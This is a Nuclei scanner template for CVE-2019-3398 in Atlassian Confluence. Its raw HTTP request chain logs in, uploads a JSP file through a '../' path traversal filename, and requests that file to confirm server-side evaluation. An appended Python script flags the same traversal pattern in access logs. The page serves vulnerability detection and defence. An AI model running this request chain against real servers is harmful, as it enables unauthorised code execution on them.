Atlassian Confluence Download Attachments - Remote Code Execution
ID: CVE-2019-3398
Severity: high
Author: rootxharsh,iamnoooob,pdresearch
Tags: cve,cve2019,packetstorm,atlassian,confluence,rce,authenticated,intrusive,kev
Description
Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs or to create a new space or a personal space or who has ‘Admin’ permissions for a space can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center.
YAML Source
id: CVE-2019-3398

info:
  name: Atlassian Confluence Download Attachments - Remote Code Execution
  author: rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs or to create a new space or a personal space or who has 'Admin' permissions for a space can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches provided by Atlassian to fix the vulnerability.
  reference:
    - https://blogs.juniper.net/en-us/threat-research/cve-2019-3398-atlassian-confluence-download-attachments-remote-code-execution
    - https://nvd.nist.gov/vuln/detail/CVE-2019-3398
    - http://packetstormsecurity.com/files/152616/Confluence-Server-Data-Center-Path-Traversal.html
    - http://packetstormsecurity.com/files/155245/Atlassian-Confluence-6.15.1-Directory-Traversal.html
    - https://jira.atlassian.com/browse/CONFSERVER-58102
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2019-3398
    cwe-id: CWE-22
    epss-score: 0.97045
    epss-percentile: 0.99757
    cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*
  metadata:
    max-request: 5
    vendor: atlassian
    product: confluence
    shodan-query:
      - http.component:"atlassian confluence"
      - cpe:"cpe:2.3:a:atlassian:confluence"
  tags: cve,cve2019,packetstorm,atlassian,confluence,rce,authenticated,intrusive,kev

variables:
  num1: "{{rand_int(800000, 999999)}}"
  num2: "{{rand_int(800000, 999999)}}"
  result: "{{to_number(num1)*to_number(num2)}}"

http:
  - raw:
      - |
        POST /dologin.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        os_username={{username}}&os_password={{password}}&login=Log%2Bin&os_destination=
      - |
        GET /pages/createpage.action HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /plugins/drag-and-drop/upload.action?draftId={{draftID}}&filename=../../../../../../opt/atlassian/confluence/confluence/pages/{{randstr}}.jsp&size=8&mimeType=text%2Fplain&atl_token={{csrftoken}} HTTP/1.1
        Host: {{Hostname}}

        ${{{num1}}*{{num2}}}
      - |
        GET /pages/downloadallattachments.action?pageId={{draftID}} HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /pages/{{randstr}}.jsp HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body_5
        words:
          - "{{result}}"

    extractors:
      - type: regex
        name: csrftoken
        group: 1
        regex:
          - 'name="atlassian\-token" content="([a-z0-9]+)"> '
        internal: true
        part: body

      - type: regex
        name: draftID
        group: 1
        regex:
          - 'ta name="ajs\-draft\-id" content="([0-9]+)">'
        internal: true
        part: body
# digest: 4a0a00473045022100cf68d5612476d4d387a8130741a04cac34138b708c32ed765eeead0672686c8a022015753134587a7b79707968cb76af91d6c3fb68edfaef26b1cfe5575698161f61:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-3398.yaml"
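For defenders who want to spot this request chain in their own Confluence access logs rather than scan for it, the following Python script is an added example; it is not part of the Nuclei template or of the ProjectDiscovery project. It parses Combined Log Format lines (the sample lines, IPs and draft ids are constructed for illustration), flags drag-and-drop upload requests whose filename parameter escapes its directory (plain, URL-encoded and double-encoded forms), and pairs each such upload with a later downloadallattachments call on the same id, which is the sequence the template above performs.

```python
"""Added example (not part of the Nuclei template): flag access-log entries
matching the traversal pattern the CVE-2019-3398 template exercises.
All log lines, addresses and ids below are constructed sample data."""
import re
import posixpath
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Combined Log Format sample. Lines 3-4 mirror the template's
# upload + downloadallattachments sequence; line 5 is a benign upload;
# line 6 uses percent-encoded dot-dot-slash.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Apr/2019:10:01:02 +0000] "POST /dologin.action HTTP/1.1" 302 0
10.0.0.5 - - [12/Apr/2019:10:01:03 +0000] "GET /pages/createpage.action HTTP/1.1" 200 48213
10.0.0.5 - - [12/Apr/2019:10:01:04 +0000] "POST /plugins/drag-and-drop/upload.action?draftId=65536&filename=../../../../../../opt/atlassian/confluence/confluence/pages/x.jsp&size=8&mimeType=text%2Fplain&atl_token=abc HTTP/1.1" 200 12
10.0.0.5 - - [12/Apr/2019:10:01:05 +0000] "GET /pages/downloadallattachments.action?pageId=65536 HTTP/1.1" 200 512
10.0.0.9 - - [12/Apr/2019:10:02:00 +0000] "POST /plugins/drag-and-drop/upload.action?draftId=65537&filename=report.pdf&size=1024&mimeType=application%2Fpdf&atl_token=def HTTP/1.1" 200 12
10.0.0.9 - - [12/Apr/2019:10:02:01 +0000] "POST /plugins/drag-and-drop/upload.action?draftId=65538&filename=%2e%2e%2f%2e%2e%2fetc%2fx.jsp&size=8&mimeType=text%2Fplain&atl_token=def HTTP/1.1" 200 12
"""

# Minimal Combined Log Format parser: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

UPLOAD_PATH = "/plugins/drag-and-drop/upload.action"
DOWNLOAD_PATH = "/pages/downloadallattachments.action"


def filename_escapes(filename: str) -> bool:
    """True if the filename would resolve outside the directory it is stored in.

    Decodes percent-encoding repeatedly (catches %2e%2e%2f and %252e%252e forms),
    treats backslashes as separators, then normalises against a fake root and
    checks whether the result climbed above it or was absolute to begin with.
    """
    if not filename:
        return False
    decoded = filename
    for _ in range(3):  # bounded: stop when decoding is a fixed point
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    decoded = decoded.replace("\\", "/")
    if decoded.startswith("/"):
        return True
    normalised = posixpath.normpath("/base/" + decoded)
    return not normalised.startswith("/base/")


def _parsed_requests(log_text: str):
    """Yield (match, path, query_dict) for each parseable log line."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than abort the whole scan
        parts = urlsplit(m["target"])
        yield m, parts.path, parse_qs(parts.query)


def find_traversal_uploads(log_text: str) -> list[dict]:
    """One record per upload.action request whose filename parameter traverses."""
    hits = []
    for m, path, qs in _parsed_requests(log_text):
        if not path.endswith(UPLOAD_PATH):
            continue
        for fname in qs.get("filename", []):
            if filename_escapes(fname):
                hits.append({
                    "ip": m["ip"], "ts": m["ts"],
                    "draftId": qs.get("draftId", [""])[0],
                    "filename": fname, "status": int(m["status"]),
                })
    return hits


def correlate_with_download(log_text: str) -> list[dict]:
    """Pair a traversal upload with a later downloadallattachments request from
    the same client on the same id, the step the template issues after the upload."""
    uploads = {(h["ip"], h["draftId"]): h for h in find_traversal_uploads(log_text)}
    confirmed = []
    for m, path, qs in _parsed_requests(log_text):
        if not path.endswith(DOWNLOAD_PATH):
            continue
        hit = uploads.get((m["ip"], qs.get("pageId", [""])[0]))
        if hit:
            confirmed.append({**hit, "download_ts": m["ts"]})
    return confirmed


if __name__ == "__main__":
    for rec in find_traversal_uploads(SAMPLE_LOG):
        print("traversal upload:", rec)
    for rec in correlate_with_download(SAMPLE_LOG):
        print("upload followed by downloadallattachments:", rec)
```

Two suspicious uploads are reported on the sample data, but only the first is also followed by a downloadallattachments call from the same client on the same draft id, which is the stronger signal to alert on. Point the script at a real `access_log` by replacing `SAMPLE_LOG` with the file contents; the parser only needs the Combined Log Format request line and ignores the POST body, so the uploaded content itself is not inspected here.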